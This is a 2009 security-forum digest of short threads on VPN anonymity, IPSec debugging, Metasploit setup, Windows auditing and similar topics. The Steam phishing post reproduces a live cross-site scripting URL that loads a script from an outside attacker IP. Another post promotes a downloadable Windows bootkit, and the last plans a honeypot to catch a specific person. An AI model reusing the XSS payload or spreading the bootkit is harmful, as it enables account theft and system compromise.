Last 10 System Security

Vpn Anonym

Wed, 18 Nov 2009 12:20:42 +0000

Hi ;

I just wanna know if i send and email och surf on the internet , for example site while i am already connected to vpn , is it possible to find out my real ip ? i mean the site owner or the mail reciever ! if yes i wonder how !

Offensive Security Has A Milw0Rm Replacement

Mon, 16 Nov 2009 17:39:40 +0000

Milw0rm is not being updated much anymore, but it seems offensive-security has started it's own archive:

/http://exploits.offensive-security.com/

Ipsec Debugging

Sun, 15 Nov 2009 19:27:45 +0000

Hey guys,

I have to do a brown bag at work going over IPSec debugging...specifically ASA's and PIX. Whenever I look around for information on IPSec debug i am only able to find debug output and then the answer on what the problem is. Any ideas as to where to find actual white paper or other documentation on how to decipher alot of the information given on a debug?

Appreciate your help,

-Lex

Stoned Bootkit

Sat, 14 Nov 2009 14:52:41 +0000

Quote

"Stoned Bootkit is a new Windows bootkit which attacks all Windows versions from XP up to 7. It is loaded before Windows starts and is memory resident up to the Windows kernel. Thus Stoned gains access to the entire system. It has exciting features like integrated file system drivers, automatic Windows pwning, plugins, boot applications and much much more. The project is partly published as open source under the European Union Public License. Like in 1987, "Your PC is now Stoned! ..again".
Peter Kleissner, Software Dev. Guru in Vienna

"A bootkit is a rootkit that is able to load from a master boot record and persist in memory all the way through the transition to protected mode and the startup of the OS. It's a very interesting type of rootkit." - Robert Hensing about bootkits

Stoned..

■is a software in the Master Boot Record, with the target to be memory resident up to the Windows kernel
■attacks Windows XP, Server 2003, Vista, Server 2008, 7
■supporting architecture: IA32, AT Architecture (IBM-conforming)
■full featured, including own file system drivers for FAT and NTFS!
■supports different boot media, hard disk, removable-media, cd, dvd, flash drives, network..
■there will be new versions, plugins and updates!
It has been sucessfully tested and verified on following systems:

Windows 2000 SP4
Windows XP SP2
Windows XP SP3
Windows Server 2003
Windows Server 2003 R2 SP2
Windows Vista
Windows Vista SP1
Windows Server 2008
Windows 7 Build 6801
Windows 7 Beta
Windows 7 RC
Windows 7

DiskCryptor 0.7
DiskCryptor 0.8
TrueCrypt 6.1a
TrueCrypt 6.2
TrueCrypt 6.2a

Bochs 2.4.1
VMware Workstation 6.5.0

EeePC 901 Windows XP SP3
Dell Studio XPS 16 Windows Vista SP1

Read the full article + FAQ at :

h**p://www.stoned-vienna.com/

There you will be able to download the software and burn in a live cd, then test it.

Is There Software Which Will Block Incoming Connections Based On The Ports They Have Open?

Sat, 14 Nov 2009 01:04:31 +0000

Hi,

I would like to be able to block certain IPs from connecting to my machine based on which ports they have open. Does this software exist?

If there is not a specific package that can do this then I was thinking of piping tcpdump to a perl script which grabs the IP of any new connection, nmaps them and blocks them using IPTables if they have certain ports open. Obviously there would be a few seconds when they would not be blocked - I don't particualy mind this. Could probably start off with a very low MTU and increase it once they have passed the portscan. Does anyone have any advice / suggestions about this?

The purpose of this is to stop people from connecting to the machine via SSH shells, RDP, VNC, proxies, tor, i2p, freenet etc etc.

Thanks,

Fractal5

Metasploit 2.4

Fri, 13 Nov 2009 19:16:12 +0000

Hello everybody,

hope someone can help me,
I´ve installed on windows 7 metasploit framework 2.4 ( with the msfconsole.bat etc )
directory is C:\programs\metasploit framework\
now, if I try to open the msfconsole.bat
there is only coming up my computer or administrator name...

User-@User-PC ~
$

does anybody know what I´m doing wrong ? the same was working on vista before
maybe something wrong with the directory in any batch file or somewhere ?

thank you

Nemesis: Problem With -O O Ip-Options-File Switch

Wed, 11 Nov 2009 15:32:46 +0000

Hello all,

I am using nemesis on windows XP to generate fake packets. I want to give "[94][04][00][00]" in IP option section. I have created a file using hex editor which contains these bytes. However, when I am giving it in -O switch, I am getting 4 Zeros in the option section ([00][00][00][00]). Interestingly, if I write "abcd[94][04][00][00]" in the text file, I see "[94][04][00][00][00][00][00][00]" as IP option. I see same the output if instead of file, I accept IP option from stdin (using "-O -" switch). Please tell me where I am going wrong. Thanks in advance.

Reminder Tutorial - Enable Auditing On Windows 7

Mon, 09 Nov 2009 19:06:22 +0000

Auditing is a one of the major tools used in detecting system intrusions or malicious activity on systems and network. And yet, even in the 'secure by design' incarnation - Windows 7, the Microsoft Client OS log event entries in the security log out of the box.

So here is another reminder on how to enable auditing on your system.To enable auditing on a computer running Windows 7, use the same old approach used in every standalone Windows OS starting from Windows 2000 Pro:

Open the Control Panel.
In Control Panel, double-click Administrative Tools, and then click Local Security Policy.
In Local Security Settings, double-click Local Policies, double-click Audit Policy, and then click the events that you want to audit.

Full story
http://www.shortinfosec.net/2009/11/reminder-tutorial-enable-auditing-on.html

Valve Steam Account Phishing

Wed, 04 Nov 2009 20:46:15 +0000

I got a couple of emails in the past few days saying my steam account got expired and I needed to renew it.
Well, I am not even sure if I have a steam account

Quote

fromSteam
tow3bd3vil@gmail.com

dateTue, Nov 3, 2009 at 3:20 AM
subjectYour Steam account has expired

hide details Nov 3 (2 days ago)

- Hide quoted text -
Dear Member,
Your Steam account has expired.
You must renew it immediately or your account will be closed.
If you intend to use this service in the future, you must take action at once!
To continue click here,login to your Steam account and follow the steps.
Thanks for helping us maintain the security of your account.
The Steam Support Team
http://www.steampowered.com

This notification has been sent to the email address associated with your Steam account.
For information on Valve's privacy policy, visit http://www.valvesoftware.com/privacy.htm.
This email message was auto-generated. Please do not respond.
VALVE © Valve Corporation. All rights reserved. All trademarks are property of their respective owners in the US and other countries.

When I checked the link, it is taking advantage of a cross site scripting flaw. Which pointed to
/http://92.241.190.202/~faaaaaaa/phising/steam/iframe.js
The url seems to be dead for now. But the vulnerability hasn't been corrected.

The vulnerability lies here.
/https://cafe.steampowered.com/directory.php?country=AL&state=%27%3E%3Cscript%20src%3Dhttp%3A%2F%2F92.241.190.202%2F~faaaaaaa%2Fphising%2Fsteam%2Fiframe.js%3E%3C%2Fscript%3E

Very Important! Which Services Cna I Install On Windows Which Are Easily Exploitable Although Pref Not Via Proxies

Wed, 04 Nov 2009 17:45:41 +0000

Background information:
A while ago my girlfriend's daughter was mollested by her father. It never went to court since a 2 year old's statement doesn't count for much these days. Soon he will be able to have visitation rights again and will be able to have her over for the night at weekends. Various events have taken place which have resulted with him being cautioned for harassing us, a couple more and he will no longer be allowed visitation. He is employed in the IT industry as am I. There is currently a court battle going on over money etc, he is very interested in what we are doing in relation to this.

What I am thinking of doing is setting up a very insecure email server from my home network, finding some reason to email him and monitoring the server. After speaking to my girlfriend it seems like he is the kind of person who would try to hack it (especially considering the on going court case.) I'm going to disconnect all other machines from the network and add a linux server, on this I will run a sniffer and VMware. Within VMWare I intend to run an XP box. I will isolate the virtual from the rest of the host OS using ebtables and from directly connecting to the router using iptables (whilst still allowing NAT and port forwarding.) I will also ask our ISP to monitor our connection.

Obviously it is very easy to make an XP machine insecure, however if I was him then I would do any hacking etc via some kind of proxy or onion routing system. I've been racking my mind for how to tackle this. The only things I can think of are UDP based services (very open rsync over UDP maybe?) TOR doesn't support UDP (I imagine I2P, Freenet etc dont either) however Socks5 proxies do support UDP. The only sure-fire way that I can think of to make sure that he doesn't use some form of proxy would be to use a service which initiates a connection back to his computer (or having a massive black list of all proxies/TOR nodes etc.) I can't think of anything which would accomplish this without seeming too obvious. Can anyone help?

Thanks,

Fractal5